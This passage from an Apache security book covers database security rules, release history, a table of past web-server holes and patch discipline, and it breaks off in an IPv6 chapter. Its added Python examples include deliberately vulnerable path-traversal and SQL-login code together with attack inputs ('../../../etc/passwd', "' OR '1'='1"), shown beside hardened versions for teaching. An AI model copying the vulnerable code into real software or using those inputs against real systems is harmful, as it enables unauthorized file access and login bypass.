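Two defects recur across Tables 5.2, 5.4, and 5.6: credentials left in files other users can read (WinMySQLadmin's my.ini, the PostgreSQL and Oracle Web Cache password files) and helper programs that run setuid or setgid while writing predictable names into /tmp (onbar_d, ondblog, onsmsync, onsrvapd). The following audit is an added example, not code from the book or any of these vendors; it checks POSIX file modes, builds constructed stand-in files in a scratch directory, and applies the two fixes the tables recommend (restrictive permissions, and stripping the set-id bits).

```python
"""File-mode audit for readable secret files and set-id helper programs.
Added example; the file names are constructed stand-ins, not real paths."""
import os
import stat
import tempfile


def secret_file_issues(path: str) -> list:
    """A file holding credentials should be readable by its owner only."""
    mode = os.lstat(path).st_mode          # lstat: never follow a planted symlink
    issues = []
    if mode & stat.S_IRGRP:
        issues.append("group-readable")
    if mode & stat.S_IROTH:
        issues.append("world-readable")
    if mode & stat.S_IWOTH:
        issues.append("world-writable")
    return issues


def setid_issues(path: str) -> list:
    """A program that writes predictable names into /tmp must not run set-id."""
    mode = os.lstat(path).st_mode
    issues = []
    if mode & stat.S_ISUID:
        issues.append("setuid")
    if mode & stat.S_ISGID:
        issues.append("setgid")
    return issues


def audit(secret_files, programs) -> dict:
    """Return {path: [issues]} for every path that has at least one issue."""
    report = {}
    for p in secret_files:
        found = secret_file_issues(p)
        if found:
            report[p] = found
    for p in programs:
        found = setid_issues(p)
        if found:
            report[p] = found
    return report


def harden_secret_file(path: str) -> None:
    """The 'restrictive permissions' fix the WinMySQLadmin entry calls for."""
    os.chmod(path, 0o600)


def strip_setid(path: str) -> None:
    """The 'strip the setuid and setgid' fix the Informix entries call for."""
    mode = stat.S_IMODE(os.lstat(path).st_mode)
    os.chmod(path, mode & ~(stat.S_ISUID | stat.S_ISGID))


def demo() -> tuple:
    """Create constructed stand-ins, audit them, apply both fixes, re-audit.
    Returns (issues before, keyed by basename; issues after)."""
    with tempfile.TemporaryDirectory() as d:
        ini = os.path.join(d, "my.ini")                 # constructed stand-in
        with open(ini, "w") as f:
            f.write("[client]\npassword=example-only\n")  # constructed content
        os.chmod(ini, 0o644)                            # readable by everyone
        tool = os.path.join(d, "onbar_d")               # constructed stand-in
        with open(tool, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
        os.chmod(tool, 0o4755)                          # setuid, as installed
        before = {os.path.basename(p): v for p, v in audit([ini], [tool]).items()}
        harden_secret_file(ini)
        strip_setid(tool)
        after = audit([ini], [tool])
        return before, after


if __name__ == "__main__":
    found_before, found_after = demo()
    print("before:", found_before)   # {'my.ini': [...], 'onbar_d': ['setuid']}
    print("after:", found_after)     # {}
```

Run the audit against the real paths from your own installation; the /tmp-name problem itself is only fixed by the vendor patch or a changed log path, so the set-id check is the stopgap the table describes.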





General Database Security Measures 


Finally, no matter what database you use, some general rules apply: 


• Try to isolate interface code from database code. I know that seems absurd,
especially because languages like PHP seem to naturally join them. However,
when your database logic is inextricably tied to your interface code, it's harder
to manage and keep secure. If you can, aim for stored procedures (and use
whatever language or protocol you like to trigger these). This way, your Web
servers will carry hardly any critical code.

• Don't base your interface off of (or make it dependent on) your database. True,
you can do some way-out things when you do this, but don't. If you do, you
invite DoS attacks (some idiot will write a shell script that calls curl, and
hammers your database to death by forcing your Web server to repaint a
specified page 100,000 times).

• Always validate input. Never allow users to send special characters.

• Isolate your Web servers. Do not run a database and the Web on the same
machine except in testing environments.

• Position your Web servers outside the firewall (or in the DMZ), and restrict
incoming access to Apache's port. Then, through a pinhole in your firewall—
through which you should authenticate your Web servers cryptographically, and
not by IP or hostname—let your Web servers send queries inside.

• If you don't use stored procedures (perhaps you're using MySQL and have no
easy means of triggering such procedures), write your code in modules. That is,
suppose your site will undertake only a few procedures (search, post a message,
automatically rotate a quotation when it paints the screen). Enclose these
functions in a single require file that scripts or PHP files call. By
centralizing your code this way, you maintain better order, and therefore
greater security. What you don't want is your developers leaving test scripts
all over the place that do things you're unaware of and so forth. Instead, they
target one or two files that contain all functions.

• Disable all default accounts that you don't need, and on your operating
system, eliminate (on both database and Web boxes) any extraneous accounts.
The only "normal" user on your database box should be your DBA; the only
normal user on your Web server should be your Web administrator account. In
other words, don't house your database on a populated machine, and no shell
accounts!

• Choose your management tools wisely. Things like phpMyAdmin seem convenient,
but always consider their potential security implications. A mysqlfront
management session tunneled over ssh is always preferable to any Web-based
application that itself uses PHP on the box.

• Don't rely on your database's native security measures alone. Always institute
other controls and superimpose these atop your database.

• Try not to pass variables in URLs. This practice, as we'll see in Chapters 14 and
15, invites disaster. You never want to see, for example, a URL like this:
http://www.yoursite.com/script.php3?name=anonymous&book=MaxApacheSec&
email=samshacker@samspublishing.com.

• If you build transaction servers or cache systems that momentarily store
database values, double-check your code to ensure that the cache or other
storage mechanism is secure and disposes of unused or exhausted values.

• Choose your DBA well. This is one position in your firm that really demands
responsibility. This person should have proven experience and be trustworthy.
If ever there was a resume you should read carefully, it's your DBA's.
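The "always validate input" rule above and the Xoops metacharacter filter from Table 5.2 (s/[^a-zA-Z0-9\-=_]//g;) describe the same control from two sides. The example below is added here and is not the book's code: it takes that character class and applies it both ways, stripping (what the s/// filter does) and rejecting (what "never allow users to send special characters" calls for), over the query string of the very URL the list says you never want to see. The e-mail pattern and the 64-character length limit are assumptions for the example.

```python
"""Allowlist validation of URL query parameters (added example, not the book's)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Characters the book's Xoops filter keeps: letters, digits, '-', '=' and '_'.
DISALLOWED = re.compile(r"[^a-zA-Z0-9\-=_]")
SAFE_VALUE = re.compile(r"^[a-zA-Z0-9\-=_]*$")
# Deliberately strict e-mail shape, not full RFC 5322: an assumption for the example.
EMAIL = re.compile(r"^[A-Za-z0-9._-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


class ValidationError(ValueError):
    """Raised for any request that must be refused and logged, never passed to SQL."""


def strip_metacharacters(value: str) -> str:
    """Sanitizing approach, equivalent to the book's s/[^a-zA-Z0-9\\-=_]//g."""
    return DISALLOWED.sub("", value)


def is_safe(value: str, max_len: int = 64) -> bool:
    """Rejecting approach: the whole value must lie inside the allowlist."""
    return len(value) <= max_len and SAFE_VALUE.match(value) is not None


def is_email(value: str) -> bool:
    return len(value) <= 254 and EMAIL.match(value) is not None


def validate_query(url: str, rules: dict) -> dict:
    """Parse the URL's query string and return exactly the parameters named in
    rules ({name: predicate}). Unknown, missing or failing parameters are refused
    rather than cleaned, so nothing unexpected reaches the database layer."""
    params = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    unexpected = sorted(set(params) - set(rules))
    if unexpected:
        raise ValidationError(f"unexpected parameters: {unexpected}")
    clean = {}
    for name, check in rules.items():
        if name not in params:
            raise ValidationError(f"missing parameter: {name}")
        if not check(params[name]):
            raise ValidationError(f"invalid value for {name}")
        clean[name] = params[name]
    return clean


# The URL quoted in the chapter's list, reproduced here as sample input.
SAMPLE_URL = ("http://www.yoursite.com/script.php3?name=anonymous&book=MaxApacheSec"
              "&email=samshacker@samspublishing.com")
RULES = {"name": is_safe, "book": is_safe, "email": is_email}

if __name__ == "__main__":
    print(validate_query(SAMPLE_URL, RULES))
    print(strip_metacharacters("O'Brien; --"))   # prints OBrien--
```

Stripping silently rewrites what the user sent and hides the attempt; rejecting leaves the bad request in your logs, which is why the second form is the better default.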
Summary
At this point, we’ve covered all the security issues that could possibly arise before 
you install Apache. The next logical step is to choose an Apache distribution. Here, 
you have a choice: use a version you're already comfortable with, or use the latest 
version. Generally, you should choose the latest release. In the next chapter, we’ll 
cover that issue. 
Apache Versions and Security


Like any software distribution, Apache is constantly 
evolving. Hence, you should always use the latest release. 
But if you don’t, at least remember to apply patches when- 
ever Apache makes them available. This chapter covers 
historical Apache holes, and will familiarize you with what 
types of vulnerabilities Web servers typically suffer from. 


Brief History of Apache Versions 


The following lists the major Apache releases, along with 
their release dates: 


• 0.6 (May 31, 1995)
• 0.6.5 (August 7, 1995)
• 0.8.14 (September 21, 1995)
• 1.0.0 (December 1, 1995)
• 1.0.2 (January 31, 1996)
• 1.0.3 (April 19, 1996)
• 1.0.4 (April 20, 1996)
• 1.0.5 (April 20, 1996)
• 1.1 (July 3, 1996)
• 1.0.5 (July 4, 1996)
• 1.1.0 (July 4, 1996)
• 1.1.1 (July 9, 1996)
• 1.2b (December 2, 1996)
• 1.2 (October 1997)
• 1.2.6 (February 10, 1998)
• 1.2.6 (March 24, 1998)
• 1.3.0 (June 5, 1998)
• 1.3.1 (July 22, 1998)
• 1.3.2 (September 21, 1998)
• 1.3.3 (October 9, 1998)
• 1.3.4 (January 10, 1999)
• 1.3.9 (August 19, 1999)
• 1.3.11 (January 22, 2000)
• 1.3.14 (October 10, 2000)
• 2.0a1-2.0a9 (March 10, 2000—December 12, 2000)
• 1.3.17 (January 29, 2001)
• 1.3.12 (February 25, 2001)
• 1.3.19 (February 28, 2001)
• 1.3.20 (May 15, 2001)
• 1.3.21 (October 3, 2001; recalled for security issues)
• 1.3.22 (October 9, 2001)
• 1.3.23 (January 24, 2002)
• 2.0.32.beta (February 16, 2002)


Only a minority of these releases were issued for security reasons, and of these, two 
were memorable: 


• For Apache 1.1.1—Research by Secure Networks triggered this release. SN
researchers found two serious holes in 1.1.1. In the first, mod_cookies had a
hole that gave attackers shell access with httpd's child's permissions. Not
everyone used mod_cookies, of course, but sites were beginning to, so Apache
distributed a security release. Additionally, mod_dir harbored a hole that
enabled attackers to gain directory listings—even when an index.html (or
default) file existed.

• For Apache 1.3—This was a security release for Tomcat 3.2.3. Tomcat 3.2.2
enabled unauthorized access to protected areas. This release closed that security
hole and included several bug fixes.
These releases notwithstanding, Apache generally dealt with security issues by releas-
ing patches when necessary. Overall, Apache’s security has been good. However, as 
new technologies emerge that Apache must support, vulnerabilities crop up more 
often—and many times, these aren’t attributable to Apache. Let’s take a quick walk 
down memory lane. 


Security Issues Common to Apache Releases 


Table 6.1 lists a few important Apache-related incidents since January 1999. These 
will familiarize you with vulnerabilities Apache and related software historically 
suffered and will suffer in the future. (Phrases italicized below highlight the source or 
result of such vulnerabilities.) 


TABLE 6.1 Historical Apache Problems and Their Causes 


Date Problem and Cause 





January 17, 1999 Debian /usr/doc exposure—On Debian 2.1, Apache allowed any 
remote user to view /usr/doc. 

June 3, 1999 Mac OS X server overload—32 or more concurrent httpd processes 
would overwhelm the system and cause a system panic. 

July 23, 1999 Squid cachemgr.cgi unauthorized remote access—Squid, a proxy 
server, used cachemgr.cgi for management. This utility contained a 
hole that enabled remote attackers to make unauthorized connections 
to a third host (using the Squid server as a springboard to attack other 
hosts). 

September 16, 1999 WWWBoard password exposure—This wasn’t an Apache issue. Matt 
Wright’s WWWBoard (from Matt’s Script Archive) had a hole that 
enabled remote attacks to obtain an administrator’s encrypted pass- 
word. 

September 25, 1999 ScriptAlias directive exposure—Apache 0.8.11 and 0.8.14 harbored a 
hole that enabled remote attackers to view CGI source code in any 
directory below DocumentRoot that had a ScriptAlias directive in the 
Apache configuration file. 

November 5, 1999 Guestbook CGI remote command execution—This was not an Apache 
issue. Matt Wright’s guestbook.pl script contained a hole that failed to 
screen attackers’ message-embedded Server Side Include directives. This led 
to attackers executing shell commands on the target. 

May 31, 2000 HTTP server (win32) root directory access—Apache 1.3.6, 1.3.9, 1.3.11, 
1.3.12, and 1.3.20 for Windows all harbored a hole whereby attackers 
could examine the root directory by sending a URL with innumerable 
forward-slash characters. 
TABLE 6.1 Continued 

Date                 Problem and Cause 

July 17, 2000        Apache::ASP source.asp example script—The ASP module Apache::ASP 
                     shipped with an example script that enabled remote attackers to write 
                     files arbitrarily to certain directories. 

July 20, 2000        Tomcat information exposure/path revealing—Tomcat 3.0 would return 
                     404 errors and append to these exhaustive information concerning paths 
                     and server status. This revealed data that could educate attackers on 
                     how to more effectively breach a target’s security. 

July 20, 2000        Jakarta-Tomcat /admin exposure—Tomcat 3.0 had a hole whereby remote 
                     attackers could break out of /admin and, in cases where Tomcat ran as 
                     root, examine the entire file system at will. 

August 4, 2000       PCCS-Mysql password exposure—This was not an Apache issue. The 
                     PCCS-Mysql database administrative tool, a PHP front-end for MySQL, 
                     called a PHP include file (dbconnect.inc) that contained administrative 
                     login information. Attackers could readily view this file with a Web 
                     browser. 

August 15, 2000      Trustix Apache-SSL RPM permissions—Trustix 1.1 (a secure Linux 
                     distribution) shipped with Apache-SSL’s permissions as world-writable. 

September 7, 2000    SuSE CGI source code viewing—Apache 1.3.12 on SuSE harbored a hole 
                     that enabled remote attackers to send a PROPFIND HTTP method request 
                     and obtain sensitive information. Apache now offers incisive control 
                     over all HTTP request methods. 

September 11, 2000   Mandrake /perl http directory exposure—In Mandrake 6.1, 7.0, and 7.1, 
                     mod_perl was configured to enable remote attackers to access /perl and 
                     all files therein. This was a case of misconfiguration. 

September 21, 2000   SuSE Installed Package Disclosure—SuSE 6.3 and 6.4 shipped with a 
                     flawed httpd.conf file that exposed a list of installed packages. This 
                     misconfiguration afforded attackers significant reconnaissance on the 
                     target. 

September 29, 2000   Rewrite file exposure—mod_rewrite contained a regex flaw in which 
                     attackers could gain unauthorized access to files mapped with regular 
                     expressions. 

November 23, 2000    IBM server DoS attack—IBM HTTP Server 1.3.6.3 harbored a weakness 
                     wherein attackers could freeze the system by sending a URL 219 
                     characters long. 

December 6, 2000     Apache+Php3 file exposure—Apache 1.3 for Windows harbored a hole 
                     that enabled remote attackers to use PHP to view files on the target. 
                     Attackers needed only a Web client and a valid filename. 
December 19, 2000    Oracle Apache+WebDB back door—Oracle Internet Server 3.0.7 provided 
                     WebDB, a management interface, which harbored a known and documented 
                     back door. Used in conjunction with Apache, WebDB would enable remote 
                     attackers to change Web pages, alter database tables, and monkey with 
                     permissions. 

January 10, 2001     Apache /tmp file race condition—Apache on Red Hat Linux 7.0 shipped 
                     with versions of htdigest and htpasswd that insecurely handled /tmp 
                     files. 

January 12, 2001     PHP source viewing—This was not an Apache issue. The Personal Home 
                     Page distribution (created by the folks at PHP), a one-stop home page 
                     creation and management system, harbored a hole wherein attackers 
                     could view PHP source code on the target. 

January 16, 2001     PHP .htaccess neutralization—In Mandrake 7.2, Personal Home Page plus 
                     Apache spelled trouble: the combination neutralized .htaccess controls, 
                     thus enabling remote attackers to gain unauthorized access to 
                     password-protected resources. 

March 25, 2001       W3C Amaya Templates Server Directory Traversal—Apache 1.3 (with W3C 
                     Amaya templates and Perl 5.004) harbored a hole that exposed directory 
                     listings to remote attackers. The hole was in the file sendtemp.pl. 

March 30, 2001       Tomcat 3.0 directory traversal—Tomcat 3.0 for NT failed to adequately 
                     filter ../ sequences. This enabled attackers to send custom-crafted URLs 
                     that would cause Apache to return directory listings. 

May 22, 2001         httpd DoS attack—Various Apache W32 distributions would fold after 
                     trying to process unusually long URLs. 

June 11, 2001        Unauthorized Mac OS X file access—Apache 1.3.14 Mac harbored a hole 
                     that enabled remote attackers to bypass explicitly articulated file 
                     access restrictions. The problem was with the underlying operating 
                     system: Mac OS X supports HFS, which is case insensitive. Apache 
                     administrators generally articulate their access restrictions 
                     case-sensitively. Because of this discrepancy, attackers could bypass 
                     such restrictions by alternating case. 

July 4, 2001         Tomcat cross-site-scripting—Tomcat 3.2.1 failed to filter embedded 
                     scripts from hyperlinks. Hence, malicious Webmasters could induce 
                     visitors to unwittingly attack third parties. 

July 6, 2001         Webmin environment variable exposure—Various Webmin versions failed 
                     to dispose of the administrator’s user ID and password, which they 
                     stored base64-encoded in an environment variable. This enabled 
                     attackers to obtain and decode the values. 
August 13, 2001      Server address disclosure—Various Apache versions returned the 
                     server’s IP address on 404 errors of directories called without a 
                     filename argument. 

August 29, 2001      mod_auth_pgsql_sys SQL attack—mod_auth_pgsql_sys, an Apache module 
                     component for PostgreSQL, enabled remote attackers to send SQL 
                     commands and, in limited circumstances, alter tables. 

August 29, 2001      AuthPG remote SQL query manipulation—mod_auth_pg, an Apache 
                     authentication module component for PostgreSQL, allowed remote 
                     attackers to send SQL commands and, in limited circumstances, alter 
                     tables. 

August 30, 2001      PHPMyExplorer arbitrary file disclosure—PHPMyExplorer is a front-end 
                     that lets you manage sites through a browser. Affected versions have a 
                     critical flaw: They allow attackers to break out of DocumentRoot and 
                     browse the greater file system at will. This is a disastrous hole that 
                     can lead to root compromise. 

September 5, 2001    mod_auth_oracle SQL attack—mod_auth_oracle, an authentication 
                     module, allowed remote attackers to send SQL commands and, in limited 
                     circumstances, alter tables. 

September 10, 2001   Mac OS X directory disclosure—When attackers used the Mac OS X client 
                     and requested a URL from affected systems, if the request included a 
                     specification of a .DS_Store file, Apache revealed the targeted 
                     directory’s contents. 

September 21, 2001   Red Hat username disclosure—Affected Apache versions would confirm to 
                     remote attackers whether a username was valid, thus enabling attackers 
                     to gather valuable intelligence. 

September 24, 2001   Oracle9i app server path exposure—When attackers send a request for a 
                     JSP file that doesn’t exist, Oracle9i reveals internal Web paths. 

October 9, 2001      mod_auth_mysql SQL attack—mod_auth_mysql, an Apache authentication 
                     module, allowed remote attackers to send SQL commands and, in limited 
                     circumstances, alter tables. 

November 8, 2001     mod_usertrack predictable UIDs—mod_usertrack, a module that provides 
                     cookie tracking, generated UIDs from a client’s IP, the system time, and 
                     the server PID. These weren’t random, in other words, and were quite 
                     predictable. 

November 24, 2001    Stronghold data disclosure—Stronghold, a secure Apache 
                     implementation, created at installation two URLs at which 
                     administrators can view server status (/stronghold-info and 
                     /stronghold-status). Outsiders could see these URLs and thus obtain 
                     valuable intelligence. 
December 3, 2001     JRun Web directory disclosure—JRun, a Java application server, allowed 
                     attackers unauthorized directory access by issuing a malformed URL. 
                     Results varied, but in many cases attackers could obtain access to 
                     protected files, including ASP source files. 

December 8, 2001     split-logfile file append—Attackers could connect to an Apache virtual 
                     host that uses split-logfile and, using a specially crafted URL that 
                     precedes the target address with a slash, overwrite or append to log 
                     files. 

December 31, 2001    Last Lines CGI remote command execution/directory exposure—Last 
                     Lines, a free, Perl-based CGI tool, failed to filter metacharacters 
                     properly and therefore enabled remote users to execute arbitrary 
                     commands sent through a Web browser and examine any Web-readable 
                     directory. 

January 7, 2002      mod_auth_pgsql SQL attack—mod_auth_pgsql, an Apache authentication 
                     module, allowed remote attackers to send SQL commands and, in limited 
                     circumstances, alter tables. 

January 7, 2002      Win32 PHP.EXE hole—Win32’s PHP.EXE allowed remote attackers to view 
                     arbitrary files and, in some cases, launch executables. 

January 31, 2002     zml.cgi file disclosure—zml.cgi, a Perl-based CGI script that handles 
                     SSI, failed to stringently filter filename arguments, and thus attackers 
                     could send a strand of ../ directives (which zml.cgi would process), 
                     and the server would return the requested file. 





In Table 6.1, I italicized phrases to highlight the cause or effect of various vulnerabil- 
ities. Let’s revisit some of those phrases now: 


• Allowed attackers to break out of DocumentRoot 

• Allowed remote attackers to send SQL commands 

• Allowed remote attackers to view arbitrary files 

• Didn’t properly screen shell metacharacters 

• Failed to dispose of the administrator’s user ID/password 

• Failed to screen message-embedded SSI directives 

• Had a 100-byte buffer 

• Insecurely handled /tmp files 

• Revealed the targeted directory’s contents 

• Shipped with permissions world-writable 
The preceding ten statements articulate the most common problems in Web server 
software. (Other problems arise, such as race conditions, but these are rarer.) 
Failed input validation, buffer overflows, bad permissions, and out-of-the-box 
misconfigurations top the list. 
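Three of those recurring causes are easier to see side by side in code. The following Python is an added example, not code from this book or from any of the packages in Table 6.1. It reproduces the patterns in miniature: a path resolver that lets ../ walk out of DocumentRoot (the zml.cgi, Last Lines and PHPMyExplorer entries) beside one that canonicalizes and checks containment; an access-restriction lookup that is bypassed by alternating case on a case-insensitive file system (the Mac OS X HFS entry) beside one that folds case; and a login query assembled by string concatenation (the mod_auth_pgsql, mod_auth_oracle and mod_auth_mysql entries) beside a parameterized one. The function names, DOC_ROOT, the user table and its single row are all constructed for the example.

```python
import os
import sqlite3

DOC_ROOT = "/var/www/htdocs"   # constructed; the checks below are lexical, so it need not exist


def resolve_vulnerable(doc_root, requested):
    """zml.cgi / Last Lines style: glue the client-supplied name onto the
    document root. A run of ../ walks straight out of it."""
    return os.path.normpath(os.path.join(doc_root, requested))


def resolve_safe(doc_root, requested):
    """Canonicalize both sides, then insist the result is still inside the
    root. A plain string-prefix test is not enough: '/var/www/htdocs2'
    starts with '/var/www/htdocs'."""
    root = os.path.realpath(doc_root)
    candidate = os.path.realpath(os.path.join(root, requested.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError(f"request escapes document root: {requested!r}")
    return candidate


def escapes_root(requested):
    """True if the hardened resolver refuses the request."""
    try:
        resolve_safe(DOC_ROOT, requested)
        return False
    except PermissionError:
        return True


def is_restricted(url_path, restricted_prefixes, case_insensitive_fs):
    """Access-control lookup of the <Location>-restriction kind. On HFS+,
    /Secret/plan.txt and /SECRET/plan.txt are the same file, so unless the
    comparison folds case there, alternating case slips past the rule."""
    if case_insensitive_fs:
        url_path = url_path.lower()
        restricted_prefixes = [p.lower() for p in restricted_prefixes]
    return any(url_path == p or url_path.startswith(p.rstrip("/") + "/")
               for p in restricted_prefixes)


def make_user_db():
    """Constructed in-memory stand-in for the table an auth module consults."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'hunter2')")
    return db


def login_vulnerable(db, username, password):
    """Query assembled by string concatenation: the client's input becomes SQL."""
    sql = (f"SELECT 1 FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return db.execute(sql).fetchone() is not None


def login_safe(db, username, password):
    """Parameterized query: the input is bound as data, never parsed as SQL."""
    sql = "SELECT 1 FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    print(resolve_vulnerable(DOC_ROOT, "../../../etc/passwd"))   # /etc/passwd
    print(escapes_root("../../../etc/passwd"))                    # True
    print(is_restricted("/SECRET/plan.txt", ["/secret"], False))  # False: bypassed
    print(is_restricted("/SECRET/plan.txt", ["/secret"], True))   # True
    db = make_user_db()
    print(login_vulnerable(db, "alice", "' OR '1'='1"))           # True: bypassed
    print(login_safe(db, "alice", "' OR '1'='1"))                 # False
```

The hardened resolver compares canonical paths with os.path.commonpath rather than testing a string prefix, because a prefix test accepts sibling directories whose names merely begin with the root. The injected password turns the concatenated query into `... AND password='' OR '1'='1'`, which is true for every row; bound as a parameter, the same string is just a password that nobody has.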


You will encounter these problems in the future—if not in Apache, then in software 
that works with Apache, Oracle, DB2, MySQL, MSQL, PostGRES, Perl, PHP, or any 
Web technology. To keep ahead of these issues, your greatest line of defense is to 
remain diligent. 


Patch Maintenance and Other Measures 


I cannot express how important remaining diligent is. Terrible things can happen 
when you fail in this regard. In the following sections, I’ll cover some common 
scenarios—real-life scenarios that happen every day. These include the following: 


• Starting with flawed software 

• Experiencing reorganization or employee turnover 

• Allowing trust relationships between machines 


Starting with Flawed Software 


This book’s CD-ROM offers many good software packages, and these days, software 
developers get many of their tools from books such as this. Indeed, the computer 
publishing industry is responsible in no small measure for Linux’s success. By 
coupling documentation with source, the industry put Linux on every bookshelf in 
this country. 


I’d estimate that approximately 30% of Apache users who also use Linux got their 
first Apache distribution from a CD-ROM in a Linux book. Frankly, many prefer 
buying a book to downloading 600MB image files and fiddling with manual installa- 
tion procedures. 


That’s wonderful. However, here’s a fact: anything you purchase off the shelf at a 
bookstore today—even if the publisher released it yesterday—is outdated. The lead 
time publishers have to get a book to market can sometimes be months. In the 
interim, the software that ships with it gradually but steadily degrades from a secu- 
rity standpoint. And this doesn’t apply only to Apache. 


Hence, if you obtain Apache, PHP, Perl, COBOLScript, BASICScript, JSP, ASP, CORBA, 
Oracle, DB2, Informix, SAP, or other tools from books, be sure that once you’ve 
installed them, you proceed immediately to the vendor’s site and obtain and install 
the latest release. 
I watched one firm install Red Hat 6.0 on its production Web servers (they bought a 
copy at CompUSA) when Red Hat was offering 7.0 on its Web site. No sooner had 
the company’s engineers installed 6.0, than a cracker from Romania took down their 
mail and Web—and he continued this activity (exploiting problems in bind and 
other utilities) until the engineers finally downloaded the update. 


Transfer of Ownership or Employee Turnover 


Another problem area is if your enterprise changes hands, reorganizes, or loses 
employees. Sometimes, Web server maintenance gets lost in the mix in these situa- 
tions. lll give you a practical example. 


In January 2001, I took a contract to design a secure EC system, chiefly for overseas 
firms. Database queries would be distributed across several continents, but the 
Apache-driven system resided in California. The contract was for 120 days but I 
finished early, on March 26, 2001, and thus left before the contract expired. 


Later that May, like many dot bombs, the firm fired the lion’s share of its develop- 
ment staff. By early September, it also fired its system administrator. From that day 
to this, the company operated without a Web administrator. The boxes ran older 
versions of Slackware and Solaris, too (both were Y2K releases) and no one had 
patched either machine since September 15, 2001. 


Anyone—even the most inexperienced hacker—could penetrate that company’s Web, 
mail, and DNS servers, and could do so today without much effort. Worse, the 
systems exposed are all production servers with one-of-a-kind technology on their 
drives, technology that cost millions in research and development. Finally, to date, 
no one has made any backups. I, the remaining 1099 on the project, am the only 
one who could restore their enterprise to even a baseline level of operation. Many 
firms slide into such situations. Don’t let yours do it. 


Network Trust Relationships 


Your Apache box may be patched, up-to-date, and relatively secure, and that’s great. 
This doesn’t mean that crackers won’t crack it. In many environments, the Web 
administrator is responsible for Web boxes only, whereas others shoulder the respon- 
sibility of securing mail, DNS, transaction, shell, application, or processor power 
servers. 


You might know that you are responsible only for Web systems, but your clientele or 
administrative staff might not know it. Worse, they might know it and not appreci- 
ate the distinction. From their view, a security breach is a security breach, and that’s 
that. 


To guard against such misunderstandings, avoid granting networks or hosts in other 
departments trust relationships with your Web servers whenever possible. If you fail 
to do this, poor security measures or lax practices in an office over which you have 
no control may come back to haunt you. If a cracker cracks a box elsewhere that has 
a bona fide relationship of trust with your server, the cracker can at least cruise your 
box without fear. 


More often than not, the authentication that such a trust relationship grants carries 
more weight than simple IP/hostname checking on TCP/IP services (for example, 
hosts.allow and hosts.deny). The cracker’s entry is therefore authenticated 
authoritatively. And once someone has shell access to your Web server, there’s no 
telling what will happen. 


Summary 


The message of this short chapter is plain: Start with a reasonably secure release and 
apply all patches, whenever they become available. Indeed, unless you have a reason 
not to, you should use Apache 2.0.x. 


NOTE 


Conditions could arise wherein you might use an earlier release. One is if you've customized 
an older release to a degree where upgrading could break software you wrote or security 
features you independently introduced. Another scenario is where you decide to study Apache 
(and Web servers in general) to see where in source code such holes develop and why. Short 
of these issues, though, stick to the latest release. 





7 

Version 2.0 IPv6 Support 


IN THIS CHAPTER 

• What Is IPv6? 

• IPv6 and Security 

• Why Does Apache Support IPv6? 

• Apache and IPv6 Addressing 

• IPv6 Implementations 

• IPv6 Address Issues in Development 


Internet Protocol Version 6 provides unlimited extension 
headers for fragmenting and routing, and will therefore 
contribute to a better and more efficiently managed 
Internet. However, IPv6’s most interesting new features are 
authentication and confidentiality. This chapter looks at 
these features and Apache IPv6 support. 
What Is IPv6? 


IPv6 is shorthand for Internet Protocol Version 6, or “next 
generation” Internet Protocol, an updated implementation 
that maximizes bandwidth efficiency and provides two 
protocol-level security layers. IPv6 provides several 
enhancements that make it superior to IPv4, the version 
nearly all internetwork applications currently use. 


IPv4 headers house ten header fields, two address fields 
(source and destination), and a handful of options therein. 
Certain IPv4 header fields are expandable, too, and support 
data of variable length. This fosters inefficiency. In 
contrast, IPv6 reduces this to something more efficient and 
clean, and expands the number of available addresses: 


• The IPv6 base header is a fixed 40 bytes, with its fields aligned on 64-bit 
boundaries 

• IPv6 header lengths are fixed 

• Addresses are 128-bit 

• IPv6 discards the header checksum 

• IPv6 replaces time-to-live (TTL) with a hop limit 

• IPv6 takes an unlimited number of extension headers 
between the Internet header and the payload, includ- 
ing hop-by-hop options, destination options, routing, 
fragment, authentication, encapsulating security 
payload, and a second destination options header. 
IPv6 also supports various flow-control methodologies that, while not yet applicable 
today, will eventually communicate to routers priority, flow labels, and so on. 


IPv6 and Security 


The Internet Engineering Task Force first publicly proposed IPv6 on July 25, 1994, in 
Toronto, Canada. IETF floated the recommendation as a proposed standard, and in 
November 1994, the Internet Engineering Steering Group (IESG) approved it. 


The result was RFC 1752, titled “The Recommendation for the IP Next Generation 
Protocol.” RFC 1752’s summary explains: 


The IETF started its effort to select a successor to IPv4 in late 1990 when projections indicated 
that the Internet address space would become an increasingly limiting resource. Several paral- 
lel efforts then started exploring ways to resolve these address limitations while at the same 
time providing additional functionality. The IETF formed the IPng Area in late 1993 to investi- 
gate the various proposals and recommend how to proceed. We developed an IPng technical 
criteria document and evaluated the various proposals against it. All were found wanting to 
some degree. After this evaluation, a revised proposal was offered by one of the working 
groups that resolved many of the problems in the previous proposals. The IPng Area Directors 
recommend that the IETF designate this revised proposal as the IPng and focus its energy on 
bringing a set of documents defining the IPng to Proposed Standard status with all deliberate 
speed. 


This protocol recommendation includes a simplified header with a hierarchical 
address structure that permits rigorous route aggregation and is also large enough to 
meet the needs of the Internet for the foreseeable future. The protocol also includes 
packet-level authentication and encryption along with plug and play autoconfigura- 
tion. The design changes the way IP header options are encoded to increase the flex- 
ibility of introducing new options in the future while improving performance. It also 
includes the ability to label traffic flows. 


NOTE 
Find RFC 1752 here: http://www.rfc-editor.org. 





IPv6 provides security at two levels: 

• Authentication 

• Confidentiality 
The IP Authentication Header Protocol 


The IP Authentication Header Protocol doesn’t encrypt data but instead ensures 
session integrity. That is, it ensures that the data that A transmits to B actually origi- 
nates from A. As expressed in RFC 2402, the IP Authentication Header Protocol 


...is used to provide connectionless integrity and data origin authentication for IP datagrams 


(hereafter referred to as just “authentication”), and to provide protection against replays. 


In replays, remote attackers use their machines to masquerade as authorized systems 
that recently established a session with a trusted remote host. Attackers capture 
packets from a session between trusted hosts and later resend or replay those packets. 
In some cases, this will fool the remote target into authenticating the attacking 
machine. 


To prevent this, the IP Authentication Header Protocol computes a keyed integrity 
check value (a message authentication code) over each packet and carries a per-packet 
sequence number. Because the key is negotiated for the session and the sequence 
